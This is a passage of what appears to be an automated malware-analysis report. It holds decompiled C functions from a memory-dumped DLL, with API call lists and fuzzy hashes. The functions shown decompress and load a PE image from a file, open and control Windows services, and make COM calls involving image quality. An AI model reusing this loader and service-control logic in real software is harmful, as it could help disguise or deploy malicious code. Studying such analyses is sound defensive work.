                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        					_t157 = _v52;
                                                                                                                        					if(_t157 == 0) {
                                                                                                                        						_t108 = _v100;
                                                                                                                        						_v80 = 0;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
                                                                                                                        						if(_v88 == 0) {
                                                                                                                        							_t111 = _v108;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t104 = _v100;
                                                                                                                        					_v80 = 1;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
                                                                                                                        					if(_t157 != 0) {
                                                                                                                        						_t106 = _v100;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
                                                                                                                        					}
                                                                                                                        					goto L21;
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0CC,00000000,00000001,6F33E08C,?), ref: 6F334A4B
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334AE1
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334B6F
                                                                                                                        • CoCreateInstance.OLE32(6F33E0AC,00000000,00000001,6F33E05C,?), ref: 6F334B89
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BD3
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BDA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 391255401-0
                                                                                                                        • Opcode ID: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction ID: 359980d816cf8c03f42de83bd4fb8e16698a513408babbae4aae24d11eee666f
                                                                                                                        • Opcode Fuzzy Hash: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction Fuzzy Hash: BA61C0B6604396AFD700DF99C880A5AB7E9BFC9304F104A5DF5998B250D732EC46CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332260(CHAR* _a4, long* _a8) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				void* _t21;
                                                                                                                        				long _t27;
                                                                                                                        				intOrPtr* _t30;
                                                                                                                        				void* _t33;
                                                                                                                        
                                                                                                                        				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                        				if(_t21 == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t27 = GetFileSize(_t21, 0);
                                                                                                                        					if(_t27 == 0) {
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
                                                                                                                        						if(_t33 == 0) {
                                                                                                                        							L6:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							_v4 = 0;
                                                                                                                        							ReadFile(_t21, _t33, _t27,  &_v4, 0);
                                                                                                                        							CloseHandle(_t21);
                                                                                                                        							_v8 = 0;
                                                                                                                        							_t30 = E6F332190(_t33, _t27,  &_v8);
                                                                                                                        							VirtualFree(_t33, 0, 0x8000);
                                                                                                                        							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
                                                                                                                        								goto L6;
                                                                                                                        							} else {
                                                                                                                        								 *_a8 = _v8;
                                                                                                                        								return _t30;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6F33227C
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F332290
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6F3322A9
                                                                                                                        • ReadFile.KERNEL32 ref: 6F3322C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3322CE
                                                                                                                          • Part of subcall function 6F332190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                          • Part of subcall function 6F332190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                          • Part of subcall function 6F332190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3322F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3075244933-0
                                                                                                                        • Opcode ID: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction ID: 9da5b79b79cb42aab962a2fd186ff172f70713cce5bba903bec4399c73d9ee20
                                                                                                                        • Opcode Fuzzy Hash: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction Fuzzy Hash: DE212B3770076067D6209A65AC49F8B7BADEBC5B32F10051AF904D7280E675E41987F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332190(void* _a4, long _a8, intOrPtr* _a12) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				intOrPtr* _v22;
                                                                                                                        				long _v30;
                                                                                                                        				intOrPtr _v42;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				long _t34;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        
                                                                                                                        				_t37 = _a4;
                                                                                                                        				_t34 = _a8;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v4 = 0;
                                                                                                                        				do {
                                                                                                                        					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
                                                                                                                        					if(_t36 == 0) {
                                                                                                                        						goto L4;
                                                                                                                        					} else {
                                                                                                                        						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
                                                                                                                        							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
                                                                                                                        							if(_t35 == 0) {
                                                                                                                        								break;
                                                                                                                        							} else {
                                                                                                                        								RtlMoveMemory(_t35, _t36, _v30);
                                                                                                                        								VirtualFree(_t36, 0, 0x8000);
                                                                                                                        								 *_v22 = _v42;
                                                                                                                        								return _t35;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							VirtualFree(_t36, 0, 0x8000);
                                                                                                                        							_t34 = _t34 + _t34;
                                                                                                                        							goto L4;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L8:
                                                                                                                        					L4:
                                                                                                                        					_t18 = _v4 + 1;
                                                                                                                        					_v4 = _t18;
                                                                                                                        				} while (_t18 < 0x1e);
                                                                                                                        				 *_a12 = _v8;
                                                                                                                        				return 0;
                                                                                                                        				goto L8;
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F33221D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F33222C
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6F332239
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201667072-0
                                                                                                                        • Opcode ID: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction ID: 1ffc6b527c721d7b521e819dfbfee453cf54da3b88b65d014aa4ecc915c3e9fa
                                                                                                                        • Opcode Fuzzy Hash: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction Fuzzy Hash: F721AE726443516BD310CE199D41F6BB3E8FBC9B21F10091DF684E7280DB60E8098AA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F3338A0(char* _a4, char** _a8, int _a12, signed int _a16) {
                                                                                                                        				char* _t5;
                                                                                                                        				void* _t14;
                                                                                                                        				int _t19;
                                                                                                                        				void* _t24;
                                                                                                                        				void* _t25;
                                                                                                                        				signed int _t27;
                                                                                                                        
                                                                                                                        				_t19 = 0;
                                                                                                                        				_t5 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                        				_t25 = _t5;
                                                                                                                        				if(_t25 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_t27 = _a16;
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
                                                                                                                        					if(_t24 == 0) {
                                                                                                                        						L6:
                                                                                                                        						CloseServiceHandle(_t25);
                                                                                                                        						goto L7;
                                                                                                                        					} else {
                                                                                                                        						if(_t27 != 0) {
                                                                                                                        							_t19 = 1;
                                                                                                                        							goto L6;
                                                                                                                        						} else {
                                                                                                                        							_t14 = E6F3337D0(_t24, _a8, _a12);
                                                                                                                        							CloseServiceHandle(_t24);
                                                                                                                        							CloseServiceHandle(_t25);
                                                                                                                        							return _t14;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t25 = OpenSCManagerA(_t5, _t5, 1);
                                                                                                                        					if(_t25 == 0) {
                                                                                                                        						L7:
                                                                                                                        						return _t19;
                                                                                                                        					} else {
                                                                                                                        						goto L2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,6F33709F,0099B240,00000000,00000000,00000001,?,00000000), ref: 6F3338B2
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F3338BE
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6F3338E2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6F333908
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F33390F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F333922
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196757001-0
                                                                                                                        • Opcode ID: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction ID: 60893e5dad7e7ba502457eb07b1cbd069f2583410f47a50608a289a6c24bd7c8
                                                                                                                        • Opcode Fuzzy Hash: 242f124db98905d00cf9128908feaab21299a1a8680d0f185ce4c86f49c5f521
                                                                                                                        • Instruction Fuzzy Hash: 4E01F9B3B05A69ABD7119A789C859BBB39DDFC5661F04012AFA40D7200DB66DC0546A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 60%
                                                                                                                        			E6F334FE0(intOrPtr _a4) {
                                                                                                                        				char* _v0;
                                                                                                                        				char _v264;
                                                                                                                        				char _v272;
                                                                                                                        				char* _t9;
                                                                                                                        				int _t10;
                                                                                                                        				void* _t11;
                                                                                                                        				intOrPtr _t15;
                                                                                                                        				void* _t21;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t21 =  &_v264;
                                                                                                                        				_push(0x105);
                                                                                                                        				_push( &_v264);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t9 = _v0;
                                                                                                                        				if(_t9 == 0) {
                                                                                                                        					_t9 = M6F340530; // 0x997378
                                                                                                                        				}
                                                                                                                        				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
                                                                                                                        				_t15 = _a4;
                                                                                                                        				_t22 = _t21 + 0xc;
                                                                                                                        				if(_t15 > 0) {
                                                                                                                        					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
                                                                                                                        					_t22 = _t22 + 0xc;
                                                                                                                        				}
                                                                                                                        				_t11 = M6F3404D4; // 0x988bb8
                                                                                                                        				_push(_t11);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				return E6F334EF0( &_v264, 1, 0);
                                                                                                                        			}













                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                                        • String ID: w %d$"%s"
                                                                                                                        • API String ID: 3693688802-504233264
                                                                                                                        • Opcode ID: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction ID: d7e8c9fe9642e7e2dd183943a42b91e8614807a1d19678c65d97b6b3a4a52554
                                                                                                                        • Opcode Fuzzy Hash: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction Fuzzy Hash: 18F0C273A0435467DB24EB68DC42FD773ACAB94704F00041DB684DB2C1EAB2A558CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 31%
                                                                                                                        			E6F336480() {
                                                                                                                        				intOrPtr* _v24;
                                                                                                                        				intOrPtr _v40;
                                                                                                                        				void* _v104;
                                                                                                                        				void* _v112;
                                                                                                                        				intOrPtr* _v124;
                                                                                                                        				char _v128;
                                                                                                                        				char* _v132;
                                                                                                                        				char _v136;
                                                                                                                        				intOrPtr* _v140;
                                                                                                                        				intOrPtr* _v144;
                                                                                                                        				char _v148;
                                                                                                                        				intOrPtr* _v152;
                                                                                                                        				intOrPtr* _v160;
                                                                                                                        				void* _v164;
                                                                                                                        				intOrPtr _v168;
                                                                                                                        				intOrPtr* _v180;
                                                                                                                        				void* _v184;
                                                                                                                        				char _v192;
                                                                                                                        				short _v196;
                                                                                                                        				char _v200;
                                                                                                                        				intOrPtr* _v208;
                                                                                                                        				intOrPtr _v224;
                                                                                                                        				intOrPtr* _v236;
                                                                                                                        				intOrPtr* _v244;
                                                                                                                        				intOrPtr* _v256;
                                                                                                                        				intOrPtr* _v264;
                                                                                                                        				intOrPtr* _v276;
                                                                                                                        				char* _t66;
                                                                                                                        				intOrPtr* _t68;
                                                                                                                        				intOrPtr* _t71;
                                                                                                                        				intOrPtr* _t73;
                                                                                                                        				intOrPtr* _t76;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				intOrPtr* _t81;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				intOrPtr* _t89;
                                                                                                                        				intOrPtr* _t91;
                                                                                                                        				intOrPtr* _t95;
                                                                                                                        				intOrPtr* _t98;
                                                                                                                        				intOrPtr* _t101;
                                                                                                                        				intOrPtr* _t103;
                                                                                                                        				intOrPtr* _t105;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				intOrPtr* _t111;
                                                                                                                        				intOrPtr* _t114;
                                                                                                                        				intOrPtr* _t116;
                                                                                                                        				short _t164;
                                                                                                                        
                                                                                                                        				_t164 = 0;
                                                                                                                        				__imp__CoInitializeEx(0, 0);
                                                                                                                        				_t66 =  &_v104;
                                                                                                                        				_v104 = 0;
                                                                                                                        				__imp__CoCreateInstance(0x6f33db8c, 0, 1, 0x6f33ddac, _t66);
                                                                                                                        				if(_t66 < 0) {
                                                                                                                        					L19:
                                                                                                                        					__imp__CoUninitialize();
                                                                                                                        					return _t164;
                                                                                                                        				}
                                                                                                                        				_t68 = _v124;
                                                                                                                        				_push( &_v112);
                                                                                                                        				_push(2);
                                                                                                                        				_push(0);
                                                                                                                        				_v112 = 0;
                                                                                                                        				_push( *_v24);
                                                                                                                        				_push(_t68);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))() < 0) {
                                                                                                                        					L18:
                                                                                                                        					_t71 = _v144;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_t73 = _v144;
                                                                                                                        				_v136 = 0;
                                                                                                                        				_push( &_v136);
                                                                                                                        				_push(_t73);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
                                                                                                                        					L17:
                                                                                                                        					_t76 = _v140;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t78 = _v144;
                                                                                                                        				_push(_v40);
                                                                                                                        				_push(_t78);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
                                                                                                                        					L16:
                                                                                                                        					_t81 = _v152;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
                                                                                                                        					goto L17;
                                                                                                                        				}
                                                                                                                        				asm("movq xmm0, [0x6f33db9c]");
                                                                                                                        				_t83 = _v160;
                                                                                                                        				_push( &_v164);
                                                                                                                        				asm("movq [esp+0x30], xmm0");
                                                                                                                        				asm("movq xmm0, [0x6f33dba4]");
                                                                                                                        				_push( &_v128);
                                                                                                                        				_v164 = 0;
                                                                                                                        				asm("movq [esp+0x3c], xmm0");
                                                                                                                        				_push(0x6f33dbac);
                                                                                                                        				_push(_t83);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t86 = _v180;
                                                                                                                        				_push(2);
                                                                                                                        				_push(_v168);
                                                                                                                        				_push(_t86);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))() < 0) {
                                                                                                                        					L15:
                                                                                                                        					_t89 = _v192;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t91 = _v192;
                                                                                                                        				_push( &_v184);
                                                                                                                        				_v196 = 0;
                                                                                                                        				_v184 = 0;
                                                                                                                        				_push( &_v196);
                                                                                                                        				_push(_t91);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))() >= 0) {
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v132 = L"ImageQuality";
                                                                                                                        					__imp__#8( &_v192,  &_v136, 0x20);
                                                                                                                        					asm("movss xmm0, [0x6f33da54]");
                                                                                                                        					_v196 = 4;
                                                                                                                        					_t95 = _v208;
                                                                                                                        					asm("movss [esp+0x2c], xmm0");
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
                                                                                                                        					_t98 = _v236;
                                                                                                                        					_push(_v224);
                                                                                                                        					_push(_t98);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
                                                                                                                        						asm("movq xmm0, [0x6f33dbbc]");
                                                                                                                        						_t105 = _v244;
                                                                                                                        						_push(_v128);
                                                                                                                        						asm("movq [esp+0x40], xmm0");
                                                                                                                        						asm("movq xmm0, [0x6f33dbc4]");
                                                                                                                        						asm("movq [esp+0x48], xmm0");
                                                                                                                        						_push(_v132);
                                                                                                                        						_push(_t105);
                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
                                                                                                                        							_t108 = _v256;
                                                                                                                        							_push( &_v200);
                                                                                                                        							_push(_t108);
                                                                                                                        							if( *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))() >= 0) {
                                                                                                                        								_t111 = _v264;
                                                                                                                        								_push(0);
                                                                                                                        								_push(_v244);
                                                                                                                        								_push(_t111);
                                                                                                                        								if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))() >= 0) {
                                                                                                                        									_t114 = _v276;
                                                                                                                        									_push(_t114);
                                                                                                                        									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
                                                                                                                        										_t116 = _v276;
                                                                                                                        										_push(_t116);
                                                                                                                        										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
                                                                                                                        											_t164 = 1;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t101 = _v244;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101);
                                                                                                                        					_t103 = _v236;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6F336488
                                                                                                                        • CoCreateInstance.OLE32(6F33DB8C,00000000,00000001,6F33DDAC,?), ref: 6F3364A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 6F33659A
                                                                                                                        • VariantInit.OLEAUT32 ref: 6F3365AC
                                                                                                                        • CoUninitialize.OLE32 ref: 6F3366C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 884428471-0
                                                                                                                        • Opcode ID: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction ID: a9ac813da4e52ee20f93106de82698f31dffcf15b40d92ed829c1863a2887f0f
                                                                                                                        • Opcode Fuzzy Hash: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction Fuzzy Hash: A371D0B5604752AFD610DF69C880E5BB7F9AFC9744F108A5DF949CB260DB30E802CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33C13A() {
                                                                                                                        				struct _FILETIME _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				union _LARGE_INTEGER _v20;
                                                                                                                        				signed int _t14;
                                                                                                                        				signed int _t16;
                                                                                                                        				signed int _t17;
                                                                                                                        				signed int _t18;
                                                                                                                        				signed int _t22;
                                                                                                                        				signed int _t23;
                                                                                                                        				signed int _t32;
                                                                                                                        
                                                                                                                        				_t14 =  *0x6f340264; // 0x363cc749
                                                                                                                        				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                                                                                        				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                                                                                                        				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
                                                                                                                        					GetSystemTimeAsFileTime( &_v12);
                                                                                                                        					_t16 = GetCurrentProcessId();
                                                                                                                        					_t17 = GetCurrentThreadId();
                                                                                                                        					_t18 = GetTickCount();
                                                                                                                        					QueryPerformanceCounter( &_v20);
                                                                                                                        					_t22 = _v16 ^ _v20.LowPart;
                                                                                                                        					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
                                                                                                                        					if(_t32 == 0xbb40e64e || ( *0x6f340264 & 0xffff0000) == 0) {
                                                                                                                        						_t32 = 0xbb40e64f;
                                                                                                                        					}
                                                                                                                        					 *0x6f340264 = _t32;
                                                                                                                        					 *0x6f340268 =  !_t32;
                                                                                                                        					return _t22;
                                                                                                                        				} else {
                                                                                                                        					_t23 =  !_t14;
                                                                                                                        					 *0x6f340268 = _t23;
                                                                                                                        					return _t23;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6F33C171
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 6F33C17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33C185
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33C18D
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6F33C199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction ID: d6c5491c1d20ec5ae5364ca9b800365bae88bd44d49d82afefd14c1119ee2fc5
                                                                                                                        • Opcode Fuzzy Hash: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction Fuzzy Hash: 810188B3D00A759BDF10EBB4C54859EB7FDEB4A361F51091AE811E7154DB709924CB80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				void* _t9;
                                                                                                                        
                                                                                                                        				_t9 = _a4 - 1;
                                                                                                                        				if(_t9 > 0xd) {
                                                                                                                        					L10:
                                                                                                                        					SetServiceStatus( *0x6f340394, 0x6f34043c);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				switch( *((intOrPtr*)(( *(_t9 + 0x6f333b48) & 0x000000ff) * 4 +  &M6F333B34))) {
